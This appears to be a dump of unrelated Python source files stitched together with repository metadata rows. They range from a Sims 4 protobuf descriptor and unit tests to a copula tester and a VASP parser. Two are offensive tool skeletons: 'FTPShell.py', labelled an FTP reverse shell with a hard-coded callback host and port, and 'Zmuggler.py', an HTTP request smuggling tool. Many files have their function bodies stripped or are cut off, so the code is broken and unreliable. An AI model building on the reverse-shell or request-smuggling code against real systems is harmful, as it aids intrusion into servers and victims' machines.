type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='digest',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.digest',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6455,
serialized_end=6542)
_SOCIALCGDIGESTMESSAGE = descriptor.Descriptor(name='SocialCGDigestMessage',
full_name='EA.Sims4.Network.SocialCGDigestMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='challenge',
full_name='EA.Sims4.Network.SocialCGDigestMessage.challenge',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidates',
full_name='EA.Sims4.Network.SocialCGDigestMessage.candidates',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6544,
serialized_end=6660)
_SOCIALGENERICRESPONSE.fields_by_name['msg_type'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALPLAYERINFOLIST_PLAYERINFO.fields_by_name['presence'].enum_type = Consts_pb2._ONLINEPRESENCESTATUS
_SOCIALPLAYERINFOLIST_PLAYERINFO.containing_type = _SOCIALPLAYERINFOLIST
_SOCIALPLAYERINFOLIST.fields_by_name['players'].message_type = _SOCIALPLAYERINFOLIST_PLAYERINFO
_SOCIALSEARCHMSG.fields_by_name['search_results'].message_type = Localization_pb2._LOCALIZEDSTRINGTOKEN
_SOCIALCASSANDRATEST.fields_by_name['opcode'].enum_type = Consts_pb2._CASSANDRATESTCODE
_SOCIALEXCHANGEMESSAGE.fields_by_name['envelope'].message_type = Exchange_pb2._EXCHANGESOCIALENVELOPE
_SOCIALFEEDITEMMESSAGE.fields_by_name['feed_type'].enum_type = _SOCIALFEEDITEMTYPE
_SOCIALFEEDITEMMESSAGE.fields_by_name['metadata'].message_type = Exchange_pb2._TRAYMETADATA
_SOCIALFEEDITEMMESSAGE.fields_by_name['followers_blob'].message_type = _SOCIALFOLLOWERSMESSAGE
_SOCIALGETWALLCOMMENTSMESSAGE.fields_by_name['messages'].message_type = _SOCIALWALLCOMMENTMESSAGE
_SOCIALPOSTWALLCOMMENTMESSAGE.fields_by_name['message'].message_type = _SOCIALWALLCOMMENTMESSAGE
_SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['messages'].message_type = _SOCIALFEEDITEMMESSAGE
_SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['unserialized_messages'].message_type = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO.containing_type = _SOCIALGETPLAYERINFOLISTMESSAGE
_SOCIALGETPLAYERINFOLISTMESSAGE.fields_by_name['player_info_list'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO
_SOCIALCONTROLMESSAGE.fields_by_name['opcode'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALCONTROLMESSAGE.fields_by_name['subop'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALCONTROLMESSAGE.fields_by_name['getwallcommentsmsg'].message_type = _SOCIALGETWALLCOMMENTSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['postwallcommentmsg'].message_type = _SOCIALPOSTWALLCOMMENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['deletewallcommentmsg'].message_type = _SOCIALDELETEWALLCOMMENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['friendmsg'].message_type = _SOCIALFRIENDMSG
_SOCIALCONTROLMESSAGE.fields_by_name['genericresponse'].message_type = _SOCIALGENERICRESPONSE
_SOCIALCONTROLMESSAGE.fields_by_name['playerinfo'].message_type = _SOCIALPLAYERINFOLIST
_SOCIALCONTROLMESSAGE.fields_by_name['feedsubmsg'].message_type = Exchange_pb2._SOCIALFEEDSUBMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['searchresultmsg'].message_type = _SOCIALSEARCHMSG
_SOCIALCONTROLMESSAGE.fields_by_name['inviteresponsemsg'].message_type = _SOCIALINVITERESPONSEMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['originerror'].message_type = _ORIGINERRORMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialcassandratest'].message_type = _SOCIALCASSANDRATEST
_SOCIALCONTROLMESSAGE.fields_by_name['socialfriendlistrequestmsg'].message_type = _SOCIALFRIENDLISTREQUESTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialrequestnucleusidfrompersona'].message_type = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
_SOCIALCONTROLMESSAGE.fields_by_name['socialnucleusidfrompersonaresponse'].message_type = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
_SOCIALCONTROLMESSAGE.fields_by_name['socialexchangemessage'].message_type = _SOCIALEXCHANGEMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialrequestfeedwallmessage'].message_type = _SOCIALREQUESTFEEDWALLMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['stat_tickers'].message_type = Exchange_pb2._EXCHANGESTATTICKERMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['comment_petition_msg'].message_type = _SOCIALCOMMENTPETITIONMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['feedremovalmsg'].message_type = _SOCIALFEEDREMOVALMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['bio_petition_msg'].message_type = _SOCIALBIOPETITIONMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['fb_event_msg'].message_type = _SOCIALFACEBOOKEVENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['requestfollowers_msg'].message_type = _SOCIALREQUESTFOLLOWERSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['responsefollowers_msg'].message_type = Exchange_pb2._SOCIALRESPONSEFOLLOWERSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['requestignorelist_msg'].message_type = _SOCIALREQUESTIGNORELISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['response_player_info_list_msg'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['player_identification_list_msg'].message_type = Exchange_pb2._SERVERPLAYERIDENTIFICATIONLISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['candidate_msg'].message_type = _SOCIALCANDIDATESMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['evaluation_results_msg'].message_type = _SOCIALEVALUATIONRESULTSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['cg_update_msg'].message_type = Exchange_pb2._SOCIALCGUPDATEMESSAGE
_SOCIALCONTROLQUEUEBROADCASTMESSAGE.fields_by_name['control'].message_type = _SOCIALCONTROLMESSAGE
_SOCIALCANDIDATESMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE
_SOCIALCGDIGESTMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE
DESCRIPTOR.message_types_by_name['SocialFriendMsg'] = _SOCIALFRIENDMSG
DESCRIPTOR.message_types_by_name['SocialPersonaResponseMsg'] = _SOCIALPERSONARESPONSEMSG
DESCRIPTOR.message_types_by_name['SocialGenericResponse'] = _SOCIALGENERICRESPONSE
DESCRIPTOR.message_types_by_name['SocialPlayerInfoList'] = _SOCIALPLAYERINFOLIST
DESCRIPTOR.message_types_by_name['SocialSearchMsg'] = _SOCIALSEARCHMSG
DESCRIPTOR.message_types_by_name['OriginErrorMessage'] = _ORIGINERRORMESSAGE
DESCRIPTOR.message_types_by_name['SocialInviteResponseMessage'] = _SOCIALINVITERESPONSEMESSAGE
DESCRIPTOR.message_types_by_name['SocialCassandraTest'] = _SOCIALCASSANDRATEST
DESCRIPTOR.message_types_by_name['SocialFriendListRequestMessage'] = _SOCIALFRIENDLISTREQUESTMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestNucleusIdFromPersona'] = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
DESCRIPTOR.message_types_by_name['SocialNucleusIdFromPersonaResponse'] = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
DESCRIPTOR.message_types_by_name['SocialExchangeMessage'] = _SOCIALEXCHANGEMESSAGE
DESCRIPTOR.message_types_by_name['SocialFollowersMessage'] = _SOCIALFOLLOWERSMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedItemMessage'] = _SOCIALFEEDITEMMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedItemUnserializedMessage'] = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
DESCRIPTOR.message_types_by_name['SocialWallCommentMessage'] = _SOCIALWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialGetWallCommentsMessage'] = _SOCIALGETWALLCOMMENTSMESSAGE
DESCRIPTOR.message_types_by_name['SocialPostWallCommentMessage'] = _SOCIALPOSTWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialDeleteWallCommentMessage'] = _SOCIALDELETEWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestFeedWallMessage'] = _SOCIALREQUESTFEEDWALLMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestFollowersMessage'] = _SOCIALREQUESTFOLLOWERSMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestIgnoreListMessage'] = _SOCIALREQUESTIGNORELISTMESSAGE
DESCRIPTOR.message_types_by_name['SocialGetPlayerInfoListMessage'] = _SOCIALGETPLAYERINFOLISTMESSAGE
DESCRIPTOR.message_types_by_name['SocialCommentPetitionMessage'] = _SOCIALCOMMENTPETITIONMESSAGE
DESCRIPTOR.message_types_by_name['SocialBioPetitionMessage'] = _SOCIALBIOPETITIONMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedRemovalMessage'] = _SOCIALFEEDREMOVALMESSAGE
DESCRIPTOR.message_types_by_name['SocialControlMessage'] = _SOCIALCONTROLMESSAGE
DESCRIPTOR.message_types_by_name['SocialInvalidateMsg'] = _SOCIALINVALIDATEMSG
DESCRIPTOR.message_types_by_name['SocialControlQueueBroadcastMessage'] = _SOCIALCONTROLQUEUEBROADCASTMESSAGE
DESCRIPTOR.message_types_by_name['LifeEventMessage'] = _LIFEEVENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialFacebookEventMessage'] = _SOCIALFACEBOOKEVENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialCandidateStatisticSubmessage'] = _SOCIALCANDIDATESTATISTICSUBMESSAGE
DESCRIPTOR.message_types_by_name['SocialCandidatesMessage'] = _SOCIALCANDIDATESMESSAGE
DESCRIPTOR.message_types_by_name['SocialEvaluationResultsMessage'] = _SOCIALEVALUATIONRESULTSMESSAGE
DESCRIPTOR.message_types_by_name['SocialCGDigestMessage'] = _SOCIALCGDIGESTMESSAGE
| 31.050625 | 10,693 | 0.763723 |
5f9ec6c74b57542c9787a229e40967ba3e06098c | 56 | py | Python | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | __all__ = ["NumpyUtility"]
from .NumpyUtility import *
| 14 | 27 | 0.732143 |
5f9f9ecefb3439db4ca570e4a61b0846cf1331d6 | 188 | py | Python | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | 1 | 2021-01-10T12:06:26.000Z | 2021-01-10T12:06:26.000Z | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | null | null | null | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | null | null | null | import sweetviz
import pandas as pd
if __name__ == '__main__':
df = pd.read_csv("BankChurners_clean.csv")
report = sweetviz.analyze(df, "Attrition_Flag")
report.show_html()
| 20.888889 | 51 | 0.707447 |
5fa0436f9f5d626cf4b365a484376d1f5343ee15 | 5,046 | py | Python | FTPShell/FTPShell.py | dsogo/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | 17 | 2020-10-07T01:37:32.000Z | 2021-12-11T21:23:25.000Z | FTPShell/FTPShell.py | Al0nnso/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | null | null | null | FTPShell/FTPShell.py | Al0nnso/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | 8 | 2020-09-22T03:14:51.000Z | 2022-03-07T16:03:24.000Z | from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from multiprocessing import Process
from pyftpdlib import servers
from time import sleep
from requests import get
import socket
import psutil
import win32api
# Al0nnso - 2019
# FTP Reverse Shell
# NOT TESTED WITH EXTERN NETWORK
try:
ip = get('https://api.ipify.org').text
except:
ip='ERROR'
pass
ftp=None
server = None
disk = "\\"
address = ("0.0.0.0", 21)
user = None
host = '192.168.15.5'# YOUR IP OR HOST
port = 443
if __name__ == '__main__':
socketConn(ftp)
| 35.535211 | 92 | 0.441538 |
5fa103b113b3be7f53cb7ec2e64ba88c2cf38693 | 8,321 | py | Python | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | 13 | 2020-02-19T02:09:00.000Z | 2021-12-16T23:15:58.000Z | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | 33 | 2020-02-12T11:21:51.000Z | 2022-02-10T00:48:17.000Z | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
import os
import pytest
from deep_reference_parser.io.io import (
read_jsonl,
write_jsonl,
load_tsv,
write_tsv,
_split_list_by_linebreaks,
_unpack,
)
from deep_reference_parser.reference_utils import yield_token_label_pairs
from .common import TEST_JSONL, TEST_TSV_TRAIN, TEST_TSV_PREDICT, TEST_LOAD_TSV
def test_load_tsv_train():
"""
Text of TEST_TSV_TRAIN:
```
the i-r
focus i-r
in i-r
Daloa i-r
, i-r
Cte i-r
dIvoire]. i-r
Bulletin i-r
de i-r
la i-r
Socit i-r
de i-r
Pathologie i-r
Exotique i-r
et i-r
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."),
("Bulletin", "de", "la", "Socit", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
actual = load_tsv(TEST_TSV_TRAIN)
assert len(actual[0][0]) == len(expected[0][0])
assert len(actual[0][1]) == len(expected[0][1])
assert len(actual[0][2]) == len(expected[0][2])
assert len(actual[1][0]) == len(expected[1][0])
assert len(actual[1][1]) == len(expected[1][1])
assert len(actual[1][2]) == len(expected[1][2])
assert actual == expected
def test_load_tsv_predict():
"""
Text of TEST_TSV_PREDICT:
```
the
focus
in
Daloa
,
Cte
dIvoire].
Bulletin
de
la
Socit
de
Pathologie
Exotique
et
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."),
("Bulletin", "de", "la", "Socit", "de", "Pathologie"),
("Exotique", "et"),
),
)
actual = load_tsv(TEST_TSV_PREDICT)
assert actual == expected
def test_load_tsv_train_multiple_labels():
"""
Text of TEST_TSV_TRAIN:
```
the i-r a
focus i-r a
in i-r a
Daloa i-r a
, i-r a
Cte i-r a
dIvoire]. i-r a
Bulletin i-r a
de i-r a
la i-r a
Socit i-r a
de i-r a
Pathologie i-r a
Exotique i-r a
et i-r a
token
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Cte", "dIvoire]."),
("Bulletin", "de", "la", "Socit", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
(
("a", "a", "a", "a", "a", "a", "a"),
("a", "a", "a", "a", "a", "a"),
("a", "a"),
),
)
actual = load_tsv(TEST_LOAD_TSV)
assert actual == expected
| 24.259475 | 88 | 0.414373 |
5fa141b264762a22f9a2b6309a86900f4d79fb07 | 389 | py | Python | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 21 | 2019-04-15T07:25:48.000Z | 2022-03-19T04:21:43.000Z | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 30 | 2019-04-15T07:18:59.000Z | 2022-03-19T07:26:57.000Z | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 16 | 2019-02-21T11:59:32.000Z | 2022-02-23T17:33:16.000Z | import json
import responses
| 24.3125 | 93 | 0.59383 |
5fa14c2eb69ff76b5ae4ab590ca445b49132d179 | 37,185 | py | Python | prescient/gosm/tester.py | iSoron/Prescient | a3c1d7c5840893ff43dca48c40dc90f083292d26 | [
"BSD-3-Clause"
] | 21 | 2020-06-03T13:54:22.000Z | 2022-02-27T18:20:35.000Z | prescient/gosm/tester.py | iSoron/Prescient | a3c1d7c5840893ff43dca48c40dc90f083292d26 | [
"BSD-3-Clause"
] | 79 | 2020-07-30T17:29:04.000Z | 2022-03-09T00:06:39.000Z | prescient/gosm/tester.py | bknueven/Prescient | 6289c06a5ea06c137cf1321603a15e0c96ddfb85 | [
"BSD-3-Clause"
] | 16 | 2020-07-14T17:05:56.000Z | 2022-02-17T17:51:13.000Z | # ___________________________________________________________________________
#
# Prescient
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
# This software is distributed under the Revised BSD License.
# ___________________________________________________________________________
from timer import Timer,tic,toc
import unittest
from copula import GaussianCopula,FrankCopula,GumbelCopula,ClaytonCopula,StudentCopula, WeightedCombinedCopula
import numpy as np
import scipy
import scipy.integrate as spi
import scipy.special as sps
import scipy.stats as spst
from base_distribution import BaseDistribution,MultiDistr
from distributions import UnivariateEmpiricalDistribution, UnivariateEpiSplineDistribution
from distributions import UnivariateNormalDistribution,MultiNormalDistribution,UnivariateStudentDistribution, MultiStudentDistribution
from vine import CVineCopula,DVineCopula
import matplotlib.pyplot as plt
import copula_experiments
from copula_experiments.copula_diagonal import diag
from copula_experiments.copula_evaluate import RankHistogram,emd_sort,emd_pyomo
from distribution_factory import distribution_factory
def initialize(dim=2,precision = None,copula_string='independence-copula'):
if dim==1:
mymean = 0
myvar = 2
dimkeys = ["solar"]
data_array = np.random.multivariate_normal([mymean], [[myvar]], 1000)
dictin = {"solar": data_array[:, 0]}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==2:
# For some tests, gaussian and student are less precised so we change so precision asked :
dimkeys = ["solar", "wind"]
ourmean = [3, 4]
rho=0.5
ourcov = [[1, rho], [rho, 1]]
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dim):
dictin[dimkeys[i]] = data_array[:, i]
valuedict = {"solar": 0.14, "wind": 0.49}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==3:
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
rho01 = 0.1
rho02 = 0.3
rho12 = 0
ourcov = [[1, rho01, rho02], [rho01, 2, rho12], [rho02, rho12, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dimension):
dictin[dimkeys[i]] = data_array[:, i]
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if __name__ == '__main__':
i=0
for distr in ['empirical-copula']:
CopulaTester().test_plot(distr)
i=+1
print(i)
| 43.644366 | 134 | 0.61584 |
5fa27ee2e5dad2743d90292ecca26ad61a23a586 | 615 | py | Python | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | 1 | 2020-07-31T06:34:27.000Z | 2020-07-31T06:34:27.000Z | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | null | null | null | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | null | null | null | from django.contrib import admin
from inbound.models import Rule, InboundIP
# Register your models here.
admin.site.register(Rule, RuleAdmin)
| 25.625 | 98 | 0.676423 |
5fa29ec1b9e32e73683aab09293ca2018836774b | 397 | py | Python | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | 2 | 2020-12-11T12:45:34.000Z | 2021-11-09T11:25:23.000Z | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | null | null | null | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | null | null | null | from django import forms
| 49.625 | 89 | 0.722922 |
5fa32fa26545cc0a0f75090c1a789058c3f6ac3d | 751 | py | Python | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | 1 | 2021-01-03T13:01:33.000Z | 2021-01-03T13:01:33.000Z | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | null | null | null | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | null | null | null | from collections import Counter
if __name__ == '__main__':
#print(solution("FRANCE", "french"))
print(solution("E=M*C^2", "e=m*c^2")) | 31.291667 | 77 | 0.609854 |
5fa6b75aa0e33eeec7402b44584c8450dcb054c7 | 1,226 | py | Python | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | #!/bin/env python
# Copyright STIFTELSEN SINTEF 2016
import suds
import urllib2
import sys
if len(sys.argv) < 4:
print ("Usage:")
print ("\t %s gss-url outputfilename token" % sys.argv[0])
exit()
# get url:
url = sys.argv[1]
outputfileName = sys.argv[2]
sessionToken = sys.argv[3]
wsdlLocation = "https://api.caxman.eu/sintef/infrastructure/gss-0.1/FileUtilities?wsdl"
client = suds.client.Client(wsdlLocation)
resourceInformation = client.service.getResourceInformation(url, sessionToken)
readDescription = resourceInformation.readDescription
if readDescription.supported:
headers = {}
headers[readDescription.sessionTokenField] = sessionToken
if hasattr(readDescription, "headers"):
for headerField in readDescription.headers:
headers[headerField.key] = headerField.value
with open(outputfileName, "wb") as outputFile:
request = urllib2.Request(url = readDescription.url, headers=headers)
result = urllib2.urlopen(request)
while True:
buffer = result.read()
if not buffer:
break
outputFile.write(buffer)
else:
print "The given gss_url does not support read/download."
| 29.190476 | 88 | 0.686786 |
5faad04658ea51684534a077173c5f03481fc86f | 6,728 | py | Python | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | 1 | 2021-07-28T06:02:44.000Z | 2021-07-28T06:02:44.000Z | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | null | null | null | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from requests import Request, Session
from requests.exceptions import ReadTimeout
import urllib3, requests, collections, http.client, optparse, sys, os
print("""\033[1;36m
_____ _
|__ /_ __ ___ _ _ __ _ __ _| | ___ _ __
/ /| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__|
/ /_| | | | | | |_| | (_| | (_| | | __/ |
/____|_| |_| |_|\__,_|\__, |\__, |_|\___|_|
|___/ |___/
| Zmuggler |
| @electronicbots |
\033[1;m""")
http.client._header_name = lambda x: True
http.client._header_value = lambda x: False
urllib3.disable_warnings()
if __name__ == '__main__':
arguments = Args()
if '--target' in str(sys.argv):
target = (arguments.link)
hrs = ZSmuggler(target)
hrs.expl0it()
else:
print("Try ./Zmuggler.py --help")
| 35.597884 | 148 | 0.5 |
5faed7df0481d882b8814038712e8be58ef77e17 | 3,397 | py | Python | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | #coding: utf-8
#import cl_to_xi_full
from __future__ import print_function
from builtins import range
import numpy as np
from cosmosis.datablock import option_section, names as section_names
from cl_to_xi import save_xi_00_02, save_xi_22, arcmin_to_radians, SpectrumInterp
from legendre import get_legfactors_00, get_legfactors_02, precomp_GpGm
| 36.138298 | 87 | 0.657345 |
5fafc8dcb4215c91fc9ae3f825e9c6da430bff4a | 326 | py | Python | software/glasgow/applet/video/__init__.py | electroniceel/Glasgow | f6d8fda1d5baec006a6c43fa3d2547a33bdee666 | [
"Apache-2.0",
"0BSD"
] | 1,014 | 2019-10-05T16:21:43.000Z | 2022-03-31T09:26:43.000Z | software/glasgow/applet/video/__init__.py | attie/glasgow | eca2cb278478d9cb9a102e6e99dfc5bd2d77a549 | [
"Apache-2.0",
"0BSD"
] | 113 | 2019-10-06T07:49:37.000Z | 2022-03-24T04:33:08.000Z | software/glasgow/applet/video/__init__.py | attie/glasgow | eca2cb278478d9cb9a102e6e99dfc5bd2d77a549 | [
"Apache-2.0",
"0BSD"
] | 79 | 2019-10-08T07:36:03.000Z | 2022-03-21T07:00:27.000Z | """
The ``video`` taxon groups applets implementing video interfaces, that is, interfaces for periodic
transfers of 2d arrays of samples of electromagnetic wave properties.
Examples: VGA output, TFT LCD capture, TFT LCD output.
Counterexamples: SCSI scanner (use taxon ``photo``), SPI LCD output (use taxon ``display``).
"""
| 40.75 | 98 | 0.757669 |
5fb11bba5257814c53fdaf00b36feffb7caef7ad | 22,329 | py | Python | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | 3 | 2016-11-18T07:19:57.000Z | 2016-11-28T08:28:38.000Z | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | """
The vasprun.xml parser interface.
---------------------------------
